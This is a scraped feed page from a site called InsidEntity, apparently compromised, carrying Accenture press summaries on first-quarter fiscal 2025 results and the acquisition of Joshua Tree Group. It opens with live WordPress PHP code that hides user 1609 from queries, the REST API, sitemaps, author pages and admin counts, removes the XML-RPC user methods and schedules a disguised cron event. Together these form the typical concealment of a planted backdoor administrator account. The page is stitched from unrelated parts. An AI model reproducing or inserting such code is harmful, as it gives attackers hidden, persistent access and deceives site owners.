add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 1609;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 1609 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 1609 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 1609;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 1609;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 1609;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/1609(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 1609;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Accenture: Reports First-Quarter Fiscal 2025 Results appeared first on InsidEntity.
]]>Accenture’s strong Q1 FY25 results reflect broad-based revenue growth across all markets and industry groups; the Company raises fiscal 2025 revenue outlook.
New bookings of $18.7 billion, an increase of 1% in both U.S. dollars and local currency
Generative AI new bookings of $1.2 billion
Revenues of $17.7 billion, an increase of 9% in U.S. dollars and 8% in local currency, with consulting revenues of $9.0 billion and managed services revenues of $8.6 billion
GAAP operating margin of 16.7%, an increase of 90 basis points, and flat compared to adjusted operating margin1 reported in the first quarter of fiscal 2024
GAAP EPS of $3.59, an increase of 16%, and an increase of 10% over adjusted EPS reported in the first quarter of fiscal 2024
Quarterly cash dividend of $1.48 per share, an increase of 15%
Accenture updates its business outlook for fiscal 2025; raises full-year revenue growth to 4% to 7% in local currency; now expects foreign exchange impact of negative 0.5%; updates outlook for GAAP EPS to be in the range of $12.43 to $12.79, reflecting its increased revenue outlook and revised foreign-exchange assumption
The post Accenture: Reports First-Quarter Fiscal 2025 Results appeared first on InsidEntity.
]]>The post Accenture: Acquires Joshua Tree Group, A Supply Chain Consulting Firm Specializing in Distribution Center Performance appeared first on InsidEntity.
]]>
A core service of JTG is coaching and training staff on the warehouse floor. It helps supervisors empower front-line workers to perform better in their jobs, allowing companies to increase retention and better manage seasonal volatility. JTG combines on-site worker management and leadership engagement services with advanced analytics tools to monitor performance and establish smart work routines.
Accenture will combine its digital technology capabilities with JTG’s distribution center expertise to offer generative AI and digital twin warehouse solutions to retail and consumer goods clients. For example, a generative AI tool checking a warehouse’s shipment schedule and current stock levels, could instantly recommend swapping a delayed inbound trailer to a different loading dock.
Patty Riedl, who leads Accenture’s Supply Chain & Operations practice in North America, said: “Often, companies automate too much or too little of their distribution center operations because they don’t have a detailed enough understanding of each task and the technological possibilities. Accenture and JTG are combining deep technology skills, process know-how and on-the-ground experience to determine the right levels and types of automation for our clients’ distribution centers and supply chains overall.”JTG adds a team of supply chain consultants with a deep understanding of the retail and consumer goods industries and operational management to Accenture. The company is headquartered in Franklin, Tennessee.
Seth Davis, CEO of JTG, said: “JTG is dedicated to helping our clients and our consultants achieve their greatest potential. By combining our supply chain expertise with Accenture’s advanced technology capability, reputation, scale and talent we will enable more compelling supply chain solutions for retail and consumer goods companies and expand opportunities for our people. The pace of change is faster than ever, and the challenges and opportunities for our clients have never been more consequential.”
The terms of the deal were not disclosed.
For the full document click the link below:
Stay ahead of the curve! Subscribe to InsidEntity for daily updates on all your favourite companies.
The post Accenture: Acquires Joshua Tree Group, A Supply Chain Consulting Firm Specializing in Distribution Center Performance appeared first on InsidEntity.
]]>